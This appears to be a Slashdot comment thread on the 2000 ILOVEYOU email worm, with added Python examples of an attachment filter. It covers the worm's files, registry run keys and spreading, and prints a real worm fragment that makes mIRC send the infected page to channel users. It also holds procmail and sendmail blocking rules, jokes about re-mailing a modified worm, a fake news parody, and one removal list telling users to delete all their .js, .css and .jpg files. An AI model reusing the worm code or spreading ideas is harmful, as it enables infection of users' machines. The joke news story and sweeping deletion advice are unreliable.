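        verdict, reasons = inspect(raw)
        print(f"{label:16} {verdict:7} {reasons}")
```

The "no_attachment" sample is rejected on the subject alone, which is the false-positive cost of a subject rule; the "renamed_subject" sample is caught only by the attachment rule.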
Knowing the company, and the size of their address book on the server, I can see this going on for a while yet.
Anybody seen any problems outside of MS software?
You can lead milk to a rolling horse, but too many cooks break glass houses.
Our company IT head sent out a Melissa warning at 12am one day. 3am rolled around and I had 3 copies of it already, two from the same person.
Ahh, the joys of Eudora on a Mac. I just sat back and laughed.
Pope
Freedom is Slavery! Ignorance is Strength! Monopolies offer Choice!
It doesn't mean much now, it's built for the future.
So what is it and what does it do?
It's a VBScript file using the Windows Script Host runtime (wscript.exe), which is on any W98 or W2k systems, plus those with IE4 or higher (plus several other products install it).
It propagates using OLE Automation against Outlook (any version), propagating both to Lists and individual addresses (internal function spreadtoemail()).
It dicks with the registry to make one of four URL's at skyinet.net ending in /WIN-BUGFIX.exe into IE's start page (IE only as it uses IE's registry entries to do this).
Replaces any file of types vbs, vbe, js, jse, css, wsh, sct, hta, jpg, jpeg, mp2, mp3 with a copy of itself.
Places copies of itself into \windows and \windows\system as win32DLL.vbs and MSkernel32.vbs and tweaks the registry so that these are loaded at startup
builds a webpage and displays it, including a request for the user to disable ActiveX security.
If you're non Win32 it's totally irrelevant. If you're Win32 but don't use Outlook it'll bugger about with some files but won't propagate. If you're Windows All The Way then it's trouble.
Not only don't i like his coding style, but he doesn't even realize you can encode vbs files for obfuscation.
It's hit 340 lists at our firm so far.
TomV
I had 16 copies of it this morning when I came in, saved a copy to look at in a text editor, and it never activated.
Weird... I have a slightly different version which has an additional "tag" in the header:
The Official Steve Ballmer Webpage
Many people in our company received the message, but because of the signs posted everywhere most of us around here didn't open the message. Right now I've got Outlook Express open and logged in to the exchange server through IMAP. I don't know how much that'll help, but I can always hope, can't I? Hell, at least I'm reading the really important email (stuff from my wife) through my ssh session with my server at home. I know Pine isn't susceptible to that shit.
That'll teach me to preview... what it says is: < i hate go to school>
The Official Steve Ballmer Webpage
since we use Outlook/Exchange for mail after migrating (partially) away from Novell and Groupwise...never mind that there's a large Mac presence at NIH, and the Mac client is way lame and not compatible with the Windows version (yet).
Some of this was my employer's idea, as well. (The migration, not the virus.)
Basically, even though 90% of the machines I support are not affected, everybody has to go without mail because they've turned off the Exchange server. I FUCKING FUCKING FUCKING hate Outlook!
I use Macs for work, Linux for education, and Windows for cardplaying.
Nothing spreads like an email virus. So why not spread some "innoculation" the same way? VirusEdu.exe: Shows you splash screens (a la Microsoft installers) on the evils of opening unsolicited, executable attachments while infecting your computer. "Tell me more" button has a list of email clients that don't automagically execute unknown programs.
--
Have Exchange users? Want to run Linux? Can't afford OpenMail?
Linux MAPI Server!
http://www.openone.com/software/MailOne/
(Exchange Migration HOWTO coming soon)
Okay, given a lot of the notices I've seen on this worm so far seem to be inaccurate, here's the rundown:
Files created/edited:
MSKernel32.vbs [created in System folder, copy of worm]
Win32DLL.vbs [created in Windows folder, copy of worm]
LOVE-LETTER-FOR-YOU.TXT.vbs [created in System folder, copy of worm]
LOVE-LETTER-FOR-YOU.HTM [created in System folder, web page with worm embedded in it]
WIN-BUGSFIX.exe [downloaded into default IE download folder]
WinFAT32.exe [created in System folder by WIN-BUGSFIX32.exe, unknown purpose]
*.vbs, *.vbe [overwritten with copy of worm]
*.js, *.jse, *.css, *.wsh, *.sct, *.hta [deleted, replaced with copy of worm with name <filename>.vbs]
*.jpg, *.jpeg [deleted, replaced with copy of worm with name <filename>.<ext>.vbs]
*.mp3, *.mp2 [hidden attribute set, copy of worm with name <filename>.<ext>.vbs created]
script.ini [if found in a directory with mIRC, overwritten with a script to output the HTML version of the worm to other users]
Registry keys created/edited:
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32 [created to run MSKernel32.vbs]
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL [created to run Win32DLL.vbs]
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page [altered to attempt to download WIN-BUGSFIX.exe on browser startup]
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX [created to run WIN-BUGSFIX.exe once downloaded]
HKCU\Software\Microsoft\WAB\... [one entry per address book entry plus a running total used during email propagation]
From all this you can work out the basic intention of the worm. It spreads via email propagation to everyone in your address book and by being sent via mIRC to other users. It maintains its hold on a machine by putting copies of itself in the Run and RunServices registry folders and by copying itself to files that look like existing files on the machine (presumably hoping the user has Hide Known File Extensions enabled).
I'm not sure about the .exe it attempts to download (other than its marker) because all the traffic has taken the target server the file is held on (www.skyinet.net) down.
Other info: the file originates in Manila, Philippines according to comments in the worm, the email title it uses is 'ILOVEYOU' and the email text reads 'kindly check the attached LOVELETTER coming from me.'
Especially when they make you admin NT servers.
/. crew are stuck in the same position as I am, dictated to by corporate or institutional policy. It's not necessarily a matter of coming out of the closet, but of frowning, lowering your head and mumbling about the boss.
I would imagine that a great number of the
"Share your knowledge. It's a way to achieve immortality." -- Dalai Lama
Anyways..what I don't get....I work for a government agency...our mail list has some 70,000 people in it......not to mention how many of those 70,000 have their own lists. Now first Melissa was out there, that was no problem for us because we were using CC Mail, after Melissa..our whole agency goes and switches to Outlook? umm.......explain the rationale behind this......? I say more viruses like this need to be spread around so some people will actually start using the gray matter between their heads....and why the fuck would you run an executable on your system if it seems so suspicious? :( but since we have the "source code" to it..I say we modify it to read something else.not "i love you" but.let's say..... "m$ sucks linux rocks" or something...and start mass mailing the M$ morons. :)
I don't know about the rest of you but I'll be glad when "god" (our main sysadmin that thinks he's right) sees his servers come to a halt and everything goes haywire..and I'll be there laughing my ass off at him....dunno. I haven't received this virus yet..
Why win9x really sucks
It's here already.. a bunch of e-mails coming from system administrators, university official mailers, etc.. A friend of mine opened it in my pc (while reading his mail) and I am really annoyed. Does anyone have any patch already? Just deleting all the (32!!) damaged files is not going to tranquilize me. This is a terrible proof of how weak is Windows and Outlook security.. how is it possible that you run a script which can rename files, overwrite them and even change the whole windows registry without at least being warned with something like "man, you are doing something dangerous". ??
I got to work this morning and it had found its way to a lot of people's inboxes here at NCS in Iowa City, IA, USA. I didn't have any of the e-mails but everybody else seemed to. maybe nobody loves me... everybody knew about it and deleted the messages anyway. Nothing bad happened to us as far as I know.
Just after that previous post, I went to delete those 16 messages from my deleted items folder... as soon as I selected the first message, the preview pane failed to appear. I immediately jumped to the task manager and saw "Virus - Running". I killed that and Outlook, which had stopped responding. As far as I can tell, nothing was sent, and none of my files were changed.
What I mean is this. I did my internship at a government agency which pays old age pension and child benefits in The Netherlands. They used a lot of the VB possibilities you find in Office. They especially built a very tight integration between their e-mail and the database that they have. Because they did this in this way, they were able to streamline the organisation in a great way. A lot of stuff could be streamlined through the organisation without the need for prints and reprints etc. Thankfully they had a security-officer that refused to open up the network to the internet and decided to install one internet terminal per department. (I hope they still have that policy)
What I meant to say was that instead of laughing at all those people using MS-products and having problems with this VB-script, we should come up with a solution that is a lot safer and gives companies the same ease of use of integrating it into their organisation.
Use Adsense for Charity
Dude, chill. Have some tea.
A lot of us *have* to use Outlook, which seems to be the most heavily affected email client, in government and/or school and/or industry. A lot of us have extensive address lists, and more importantly, this worm is actually destructive, unlike Melissa. Overwriting many, many, many different files with itself is Not Nice Behaviour.
Don't laugh at the victims for not using Linux. Laugh at them for being utter idiots who decide to run unknown VB scripts blindly.
From the BBC "Computer virus experts are currently battling to find an antidote to the problem, which is thought to be targeting idiots..." -Bruno "Truth Against the World" -FLW
I know we can rant on all day about how this never should have happened, but let's be a bit more productive and inform users how to protect themselves against this Love Letter Virus.
For this virus to work, it needs to run inside the Windows Scripting Host, which is sorta like a shell with UI.
The best way to protect your computer is to take 2 steps:
1) Close down all your open (writable) shares. If somebody has mapped a share on your drive to a drive letter on their computer, they can cause the files in that share to be overwritten by this virus (*.MP3, *.JPG, *.CSS to mention a few). So even your SAMBA shares aren't safe if they allow users to write on them.
2) If you are on a Windows 9x/ NT / 2000 / ME machine, go to your system directory and change the name of your Windows Scripting Host executable from wscript.exe to something like _wscript.exe. This makes sure that whenever your system tries to find the Windows Scripting Host for running any VBScript on your system, it can't find the EXE.
To see if any of your files got infected on a Windows Box, scan all your drives for a file with the .vbs extension and containing the text ispyder@mail.com. Don't run the files, just delete them. You should also look into cleaning some registry entries, and perhaps also deleting a file called WIN-BUGFIX.EXE.
I hope this helps. Good luck!
BLaH(c)
Anyone got a decent sendmail solution? Pretty please? My sendmail skills blow =(
--
Peace,
Lord Omlette
AOL IM: jeanlucpikachu
[o]_O
I called SkyInet.net in Manila (whose servers were being used to distribute the second part of the virus, payload still unknown) about 10AM CET (8AM UTC) this morning.
I guess it was about 8PM there, and the lady on 24hr support sounded VERY harassed. Still, nice to get a proactive response out of them quickly - they deleted the files within 1/2 an hour.
I think System Administrators should send a similar e-mail as this one every once in a while to all their users.
:)
An unharmful version of it, that is, which only sends a reply back to the administrator. This way, he/she can warn the user for not ever opening anything he/she does not know of.
Of course, the administrator will have to fake his e-mail addy, but that shouldn't be hard
Just an idea... don't count on the web becoming virus-less... take countermeasurements.
-----------------------------
-----------------------------
If you can't blind them with brilliance, baffle them with bull.
anybody tried to ping www.skyinet.net recently?
or a traceroute?
small bit of a problem there methinks...
we have 10% (and rising) of the known world recursively re-infecting themselves with a virus that not only fscks up your hdd, but also tries to download a file from a web server and (surprise surprise), the web server falls over (and by the looks of it most of the surrounding infrastructure of that part of the net - unless they have purposefully disconnected themselves).
now what would happen if the script pointed itself at yahoo...
much easier than all this messing around with indirect ping triggers for launching nested attacks from previously compromised boxes.
ho hum. M$ we love you. not.
The only Good System is a Sound System
Too bad MS didn't include antivirus with the OS instead of IE.
love is just extroverted narcissism
After looking at the source code and seeing that it makes your start page in Internet Explorer one of 4 random sites at skyinet.net, then wouldn't it be a DoS against skyinet.net as well? skyinet.net is down right now, though I am not sure if it's because of this, or they are denying all requests until they can remove the pages.
They appear to be the #1 type of virus affecting people in the world today by numbers, just by looking at the symantec virus database.
This could all be fixed by Microsoft if they wanted to, yet they don't fix it, and everywhere I look, people are saying "it's not microsoft's fault"
How can a security hole as demonstrably large as this remain unfixed for so long? 1 jr. high kid in the Philippines writes a small virus saying how he hates to go to school, and in less than 2 days, he has disrupted communications in most of the world. (30,000 without email in my company alone today)
What can be done to focus people's attention on this security hole, nobody seems to care that it exists, and it is exploited over, and over, bringing companies to their knees time and time again.
or am I being overly critical here, and this isn't anything unreasonable? To me, it seems obvious, and I don't understand how the mainstream press hasn't begun to pressure Microsoft to stop these virus attacks by fixing their software.
________
1995: Microsoft - "Resistance is futile"
And to think, some of the West coast is still sleeping soundly in their beds. What a day they're in for.
I'll stick with procmail and elm, thank you.
* Subject:.*ILOVEYOU
simply because they've royally pissed off enough technically adept folks and are such a large target - if the DOJ/Courts doesn't take care of their unfair trading practices, the underground assassins will.
Something along the lines of the devil's dictionary of an absolute monarch: He can do anything he pleases, so long as he pleases the assassins.
try { do() || do_not(); } catch (JediException err) { yoda(err); }
The server where WIN-BUGFIX.EXE resides, www.skyinet.net seems to be unreachable all the day - seems to be a kind of "slashdot effect", although I'm pretty damned sure that this is not /. which caused this effect...
But we need to make sure everybody gets the warning. I propose that we put a vbscript attachment on the warning email so that it sends itself to everyone in the recipient's address book.
If you can read this, then I forgot to check "Post Anonymously".
Just announced on The Register a fix has been produced for the script and it can be downloaded from Dr Solomon's Web Site
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
Is it making a script for mIRC?? Damn, thats evil.
--fatboy
From the article:
Visual Basic files used by webmasters
I feel that anyone calling themselves a master of the web, but who uses VB, probably has some issues.
--
E_NOSIG
There is a really quite simple fix for this, it comes down to basic security that should be practiced at all times. For example, this worm (among others) spreads its disease through the use of the address book in outlook express.
This address book contains email addresses that the person enjoys sending/receiving email with. You could say, the address contains a list of "friends" to the user. The best way to fix being "labeled" as a "friend" is to use words like "I hate you" and "get away from me", spitting, cursing and talking bad about the pope also are some basic security measures you can take to avoid being put into this "address book" which will be used to send virii/worms to.
Also since this is spread through the use of outlook express, which is an email program. Email programs are used to communicate between two users or persons. I can only conclude that communication between humans, in any form is a major security risk and should be stopped.
The two basic security principles we learned here are
1) communication between humans is bad and should not be allowed
2) be a complete jerk so that even if rule one is broken, you will still have a "fail safe" method in which people will avoid communications with you.
"`Ford, you're turning into a penguin. Stop it.'" -THHGTTG
# grep ILOVEYOU /var/spool/mail/* |wc -l
12
nyahahahahah... should I warn them?
Anybody want to mirror the latest mcafee executables & dat files ?
If you look at the code for the virus, you will see that it uses the Windows Scripting Host. Any sysadmin who left Windows Scripting Host on their system is just asking for trouble. Ever since that came out a year ago, every security site and book has at least in brief mentioned it as a gaping security hole because Windows will automatically run scripts through it without checking for permissions, blah blah blah.
I and the two techs here at work removed it a while ago. We've received two of the emails from other companies, but they have fallen dead in the water.
Remove Windows Scripting Host from your computer, and you should be fine! So far, the best tool to use to remove WSH is fdisk. WSH comes as default on Win98 and W2k. NT can get it, but it is not installed as default.
I just got hit with the virus at my workplace. here's the funny part. The extremely attractive female coworker who sent it to me(twice!) would be the LAST person who would ever love me, or even talk to me.
Talk about the ultimate irony.
There is an article and already an update.
Happened in our work today too. The preview pane in Outlook doesn't set it off though. Something to note is it ends in .txt.vbs. On a standard install of windows the filename extensions are turned off so it *looks* like a .txt file on first glance. In most cases that's all it takes to open it. Not a microsoft fan.
Nice to see some innovation at work here...
Microsoft: Don't Innovate, Regurgitate!
So far this morning I have received 6 copies of the I Love You virus, and 7 warning emails about the virus from sysadmins, friends, and concerned department secretaries. I sometimes wonder if the barrage of alerts I get is worse than the actual virus.
Idol Star Astronomer
normal(adj)- people who don't sit on slashdot all day wondering why everyone else isn't building robots [DECS]
Oh, great.
WASHINGTON, D.C. (Reuters) - The "I Love You" e-mail virus, which has crippled hundreds of businesses and ISPs in the U.K., has been traced to an American computer discussion site. "We were baffled as to where this deadly new threat had come from," said Richard Josephs of the FBI's computer crimes division, "until we learned that the source code to the virus was available on Slashdot.org." "Source code" refers to the computer-language instructions that a programmer "compiles" to produce a wide variety of applications, from Microsoft Word to Microsoft Excel.
The FBI was informed of the code at 8:03 Wednesday by a courageous anonymous hero, who claimed he has been monitoring the slashdot.org page for evidence of illegal activity ever since it published the "source code" for DeCSS, a program invented by hackers to illegally copy and resell copyrighted DVDs over the Web.
The Department of Justice is preparing to file charges against the hacker-friendly slashdot.org, despite protests from its owners. One, a shadowy figure known only as "CmdrTac0" claims that the source code could have come from anyone who received the virus. But experts say this is unlikely, because there is no known way to keep Microsoft Outlook from launching the virus program upon receipt.
We have been unable to find the anonymous hero who reported the presence of the code on Slashdot.org, but the FBI official who spoke with him said he repeatedly asked if they had the unlisted phone number of actress Natalie Portman.
-----
Go ahead, blame me... I voted for Nader!
I must say, I feel even better than I usually do about using such a wonderfully fabulous mail program. Being a teenage boy, I have to mack it with the ladies, that goes without saying. In an ever technology laden world, the girls I chill with tend to want to chat over *shudder* AOL, so I'm more than happy to use AIM, but when it comes to getting gobs and gobs of terrible fwd's from them, a smile comes to my face when they write a day later and say, "DON'T OPEN THAT OTHER MAIL I SENT YOU!! IT HAS A VIRUS!!" Who would have thought "Happy99.exe" could be evil? ;) Thanks pine!
-- From my Best Friend (Written to me over ICQ): "i was gonna go to a party...but i had to reinstall windows"
Everything else is just red herring. What me paranoid?
Wyse not wise
And you seem to forget that *THIS* right here is text. Text *IS* the medium we use...some people just like it wrapped up in graphics, thinking this makes life easier.
Now...Dissing Unix? Keep in mind that VMS->WNT 3.1 was going to be a 'better unix than UNIX' and the model of the X window terminal was dead. (BTW, anyone have copies of these original Micro$oft proclamations) Today, it is Unix and M$...that is about all that is left standing, even Apple is going to Unix. And the X terminal model is alive and well, re-done as the 'application server' Citrix.
So, like it or not, AC, Unix *HAS* WON! M$ wants to BE unix, Apple is moving to Unix....its all over for you but your crying. Is Unix the best model for an OS? Perhaps, perhaps not, and perhaps one day Unix will be replaced. But for right now, Unix is the horse to beat!
If it was said on slashdot, it MUST be true!
I am sick and tired of having to deal with microsoft's insecure software. Microsoft has cost me and my company Millions ever cince we started using their software. Second we had no choice to use their software. When microsoft is shown the problems in their products they say "It's not a problem it's a feature" WEll it's time to start suing them.... if they write poor software, they should pay the piper. And the man that authorized how outlook works should be pubically impaled. (forgive the spelling, I'm typing on a server keyboard as admin trying to fix this microsoft crap)
Do not look at laser with remaining good eye.
Moderators, please moderate the parent up! Thanks for posting it, it works great. We've now re-enabled external email and it's bounced about a million virus emails so far...
Pete.
Based on the MELISSA hack of yore. It's working for us, and will return the mail to sender. This will work as long as a variant doesn't appear with a different subject (at which time, you simply add another pattern and appropriate error message). Be on the lookout for the tab-separation that is required for sendmail.cf files. The MELISSA hack comes with version 8.9.3, so have a look at the features for recompiling a new CF file.
D{Lpat}ILOVEYOU
D{Lmsg}This message may contain the ILOVEYOU virus.
# Send the Subject: header through the Check_Subject ruleset
HSubject: $>Check_Subject
SCheck_Subject
# Left and right sides of each R line are separated by tabs, not spaces
R${Lpat} $*	$#error $: 553 ${Lmsg}
RRe: ${Lpat} $*	$#error $: 553 ${Lmsg}
Funny that it takes ;-)
mass communication and buggy software
to spread love on a global scale
If Napster, etc can be liable for what users do with its technology, Microsoft is grossly negligent for what users do with its technology.
--mark
"A Class Action, Part II"
Just shut down our exchange server (here in the US) in the past 10 min (that's why I'm on
The problem is not the server.
Shutting down the mailserver doesn't help much.
The problem is Outlook and Outlook express.
Anybody who is using Eudora (Pro) or Lotus Notes doesn't have a problem at all.
And this "virus" doesn't work on MacOS, Linux, Solaris.
Only if you are using that crap from Redmond you have a problem.
The only reason why mailserver are going down is the sheer number of messages.
I also found out that this "virus" damaged a lot of
But this was because the infected machines replaced lots of files....
When I started Outlook this morning I had 4 messages from the sysadmin warning me not to open these things. There were also 2 copies of the virus which I deleted. I just started up Outlook to see if I'd received any more copies of the virus, and guess what? There weren't any. Instead there's 5 more warnings from the sysadmin.
in case nobody's posted this yet - i didn't see it anywhere - here's the source for all you VB hackers:
:P
http://option8.com/love.txt
i tried posting it directly, but got: Lameness filter encountered. Post aborted.
- Entertaining Bits from the Ancient Kernel Tree
Tell me how? Does the preview pane in Outlook execute an attachment? Does it execute a VBS script?
The preview pane will run scripts embedded in HTML/MIME mail, unless you have scripting disabled in IE's "Internet" zone. Good day.
Everyone bashes MS, with good reason, but could something similar be written in AppleScript for the Macintosh?
This is on topic, but it's going to take me a bit to get to it. Moderators, have faith :)
One of the reasons that the government thinks it'd be a good thing to break Microsoft up the way they want to, is that without having an OS division, MS-Apps would do things like port Office to Linux.
Red Hat, among others, sees this as a good thing, since the #1 reason they get for people not wanting to switch over to linux is "I can't use my (.DOC | .XLS | .PPT) files"
I think about the porting of Office to Linux and see many others adopting Linux as a result. I then see clueless newbies who run as root all the time opening .DOC attachments in their mail, and having a macro virus attack them. :)
And if MS-Apps ports Office over, why not Outlook? Right now, most folks think it's fairly rare to see a virus on Linux. If Microsoft ports Office/Outlook over, and clueless newbies/managers get ahold of it, the scarcity of viruses for Linux will vanish.
I can see the headlines now: "Melissa ported to Linux!"
I think I'll stick to Pine
-Denor
Why is everybody so concerned?
If every software company made their e-mail programs like Outlook this world would be a better place. Everybody would receive messages all day, telling them how much people love them! Now seriously, that's not a bad thing, is it?
I guess nobody loves me.
It's a bit like a popularity contest. The more peoples addressbooks you're in the more copies of the trojan you'll get.
BTW, all these filters being put in place. Do they just use the subject line? If so wouldn't it be trivial to change that and send it off again?
Deleted
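The filters posted in this thread match on the subject line, which stops working as soon as the subject changes; the procmail approach mentioned earlier, blocking on attachment type, does not have that weakness. The following is an added example, not code from any commenter: the extension sets, addresses and sample messages are constructed assumptions.

```python
import re
from email import policy, message_from_bytes
from email.message import EmailMessage

# Script types the thread lists as run by Windows Script Host or used by the
# worm, plus .exe for the downloaded payload. The exact set is an assumption.
SCRIPT_EXT = {"vbs", "vbe", "js", "jse", "wsh", "sct", "hta", "exe"}
# Harmless-looking extensions placed in front of the real one as a decoy.
DECOY_EXT = {"txt", "jpg", "jpeg", "mp3", "mp2", "doc", "htm", "html"}


def normalize(filename):
    """Lower-case the name and drop trailing dots/spaces, which Windows ignores."""
    return re.sub(r"[. ]+$", "", filename.strip()).lower()


def classify_name(filename):
    """Return the reasons (possibly none) for blocking an attachment name."""
    parts = normalize(filename).split(".")
    reasons = []
    if len(parts) >= 2 and parts[-1] in SCRIPT_EXT:
        reasons.append("script-extension:" + parts[-1])
        # LOVE-LETTER-FOR-YOU.TXT.vbs shows as a .TXT file when Windows
        # hides known extensions, so report the decoy separately.
        if len(parts) >= 3 and parts[-2] in DECOY_EXT:
            reasons.append("double-extension:%s.%s" % (parts[-2], parts[-1]))
    return reasons


def check_message(raw_bytes):
    """Parse one message and return (verdict, [(filename, reason), ...])."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        name = part.get_filename()  # taken from Content-Disposition / name=
        if not name:
            continue
        findings.extend((name, reason) for reason in classify_name(name))
    return ("reject" if findings else "accept"), findings


def build_sample(subject, body, attachment_name):
    """Build a constructed test message with a placeholder attachment."""
    msg = EmailMessage()
    msg["From"] = "alice@example.com"
    msg["To"] = "bob@example.com"
    msg["Subject"] = subject
    msg.set_content(body)
    msg.add_attachment(b"constructed placeholder, not worm code",
                       maintype="application", subtype="octet-stream",
                       filename=attachment_name)
    return msg.as_bytes()


# Constructed samples: the subject and body quoted in the thread, a variant
# with a different subject, and a harmless mail that a subject filter bounces.
SAMPLES = {
    "original": build_sample(
        "ILOVEYOU", "kindly check the attached LOVELETTER coming from me.",
        "LOVE-LETTER-FOR-YOU.TXT.vbs"),
    "renamed": build_sample("Meeting notes", "see attached", "notes.TXT.VBS"),
    "benign": build_sample("ILOVEYOU", "just a text file", "readme.txt"),
}

if __name__ == "__main__":
    for label, raw in SAMPLES.items():
        print(label, check_message(raw))
```

The "benign" sample is accepted here although a `Subject:.*ILOVEYOU` rule would bounce it, and the "renamed" sample is rejected although that rule would pass it.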
Hm, now that I got a love letter from my boss, can I sue him for sexual harassment and make big cash? ;)
[Disclaimer: I didn't actually. Being at a Unix-only place definitely has good sides.]
This message is provided under the terms outlined at http://www.bero.org/terms.html
If you examine the code you'll see that the JPG and JPEG files are deleted, yes, but MP2 and MP3 files are marked with the Hidden Attribute.
You guys are short-sighted. What this really means is this :- There are so many people in the world yearning for love. The world is love deprived. They are being exploited by the virus writers. Go loving around!
Taking a biological view of it, you can see that what many trumpet as "standardization of platform" may create efficiencies for developers, but also for viruses. Any biologist knows that a genetic monoculture is subject to sudden and massive extinction. Imagine a virus that simply and truly wiped disks clean of windows; that it was 100% virulent and contagious; if not for non-windows users, there could be no computers left running. Or take the recent hacking of AboveNet; it was characterized as a denial of service attack, but it wasn't bandwidth flood. It seems to have been something that allowed routers to be taken down; it's easy to see that the severity of the assault would be proportional to the uniformity of their routers.
Vive la difference or die.
Boss of nothin. Big deal.
Son, go get daddy's hard plastic eyes.
Expanding a vast wasteland since 1996.
Well at 10:45 CST NCS shut down their exchange server. It probably won't affect business too much except people will have to talk to each other on the phone (GASP!). Somebody finally loved me which makes me happy though. What about people that aren't here today that come in tomorrow though. Maybe more harm will come tomorrow.
We contracted this this morning, though some people got it yesterday. We have generated a quick fix today, that has worked for us. it can be got from: http://www.gotan.org/tmp/scripts.zip enjoy, Tim.
and then God said: 'void *universe; while(1) if(create_order(universe)) create_chaos(universe);'
It hit us before 9 this morning, 250 users w/o e-mail.
Well then this is your chance to break free - "Look at what M$ has let happen to us! Let's change."
Remember that this virus will have affected your managers. Let them know there is an alternative and they might act while the problem is fresh in their minds.
TWW
"Encyclopedia" is to "Wikipedia" what "Library" is to "Some people at a bus stop"
Someone obviously does not like SkyInet
Thank you, Microsoft! Without your wonderfile innovation, this kid would still be an unknown...
"Widget choice makes me horny." -
One of the programmers where I work has gone through the .vbs file and summarized what it does and how to fix it. You might have a better chance reading this than clicking on the slashdotted links that CT just added.
OK, here's a summary of what the script file does:
1. Disables the timeout in the scripting host so that the script may run indefinitely. (The default behavior kills a script after a time limit because it is assumed to have failed).
2. Copies itself to c:\windows\system\mskernel32.vbs.
a) Adds this to registry at HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
3. Copies itself to c:\windows\win32dll.vbs
a) Adds this to registry at HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
4. Copies itself to c:\windows\system\lover-letter-for-you.txt.vbs
5. Creates a file called c:\windows\system\love-letter-for-you.htm, which downloads itself and runs the script. (Tells the user it needs an ActiveX control so the user must click a button to run it).
6. Iterates through all the files in the system on fixed drives and mounted network drives (not unmounted shares)
a) It overwrites all files with the extensions .vba, .vbe, .js, .jse, .css, .wsh, .sct, .hta, .jpg, .jpeg with a copy of itself.
i) Note: this merely destroys .css, .js, .jse, .hta, .jpg, .jpeg files.
b) It writes a copy of itself for every .mp3 and .mp2 file on the system (A file called Bobs.mp3 will have a matching Bobs.mp3.vbs)
c) If a folder containing MIRC is found, it writes a script into the script.ini (run at startup) that sends the previously generated love-letter-for-you.htm to every person in any group you join.
7. If outlook is installed, it goes through every name in every address book and forwards the message you probably received.
8. If c:\windows\system\winfat32.exe exists (which isn't part of a normal install and the script doesn't install it so I don't know where it comes from), it resets the start page to download an EXE. Again the user will be prompted to accept and run the file.
a) If the user manages to download this program, and the script is run again, it kindly resets the home page to blank.
So, to remove this virus, delete:
All .vba, .vbe, .js, .css, .wsh, .sct, .hta, .jpg, .jpeg files.
c:\windows\system\mskernel.vba
c:\windows\system\lover-letter-for-you.htm
c:\windows\system\lover-letter-for-you.txt.vbs
c:\windows\system\win32dll.vbs
your MIRC script.ini
HKCU\Software\Microsoft\Internet Explorer\Main\Start Page
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\Win32DLL
HKCU\Software\Microsoft\Windows Scripting Host\Settings\Timeout
All-in-all it's pretty destructive and pretty dumb, definitely the product of some 13 year olds with terrible English.
"Never wrestle with a pig. You both get dirty and the pig likes it."
That's all well and good, but I wish they'd keep in mind that he wouldn't have been able to do any of this mischief without the months of labour on the part of Microsoft engineering that laid the groundwork for this sort of thing. OLE, VB, Outlook, etc all working together to help viruses propagate.
It's as if Microsoft has been stacking tubes of dynamite in the town hall for months, and one day some fruitcake comes in with a lit match. Sure, the fruitcake is guilty, but there's some serious negligence here as well...
Jeremy, your friendly Slashdot anti-M$ zealot
I don't care if it's 90,000 hectares. That lake was not my doing.
This Trojan was obviously written by Lars Ulrich of Metallica.
In a surprisingly clever ruse to throw us off his trail, he programmed it to delete certain files in formats other than MP3.
Come crawling faster...
Obey us, Napster!
Your life burns faster...
Obey us, Napster!
Napster
Napster of the Internet is a terrible thing...
treating our art like it's a commodity.
Robbing us blind, we can't afford a thing...
Bootleg our work, but not as MP3s!
Napster
Napster
Then news of this virus starts going around, and I look closely at the fax. It says it "originated from a (COMPANY NAME) Faxcom," and has the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs". Apparently, our fax number was in her computer, and it faxed us a text copy of the virus. Anyone want it? :)
-brennan
We have people running 98 and 2000 and it came from both. There is a setting depending on the Internet zone you have assigned as to whether it automatically runs the HTML scripting.
At the end of the script is the HTML code and of course this runs in the preview pane, via the OLE wscript file in the Windows directory. Sooo glad I don't use it, and have my Internet zones set up so that scripts don't run except in those sites I allow..
It seems that the HTML code at the end of the E-mail (not the attachment) tries to open the attachment via Active Scripting..
It says in the header of the HTML.. "simple but i think this is good..."
Is this a half finished virus, because it looks it to me. Some kid in school has half written it, shows his friend, who then sets it free before it is finished properly...
Everyone keeps saying that this beast deletes MP3 files. It does not, at least not where I work. For an MP3-file A.mp3, it creates an A.mp3.vbs that contains the worm. The original file is left intact.
It _does_ delete JPEG-files, though. It creates a file A.jpg.vbs, and then deletes the original file. Check the code, it's all in there.
To sum up, you lose your porn, but get to keep your pirated music. This must have been written by one of those extremist women.
I found this news article only just a few minutes ago...
WASHINGTON:
U.S. District Judge Thomas Penfield Jackson has issued a ruling in the Microsoft VS the Department Of Justice case regarding the breakup of Microsoft into 2 or possibly 3 'Baby Bills'.
Judge Jackson was quoted as saying, "Only moments ago, I received a rather bizarre email from Mr. Gates, titled as "I LOVE YOU" in the subject line. At first, I thought it was perhaps just another plea to 'let [him] innovate', but after opening the attachment, I found myself infected with a virus. I am very upset with Mr. Gates."
The breakup is to proceed immediately.
#!/bin/bash
### Run this script for a Great Time with Me! ###
foreach luser in `cat
foreach file in `find
Now I am an eeevil cracker. Muahahaha!
I think, therefore thoughts exist. Ego is just an impression.
First, you need to patch Sendmail ...
Go to this excellent sendmail patch: sendmail patch by Koos van den Hout
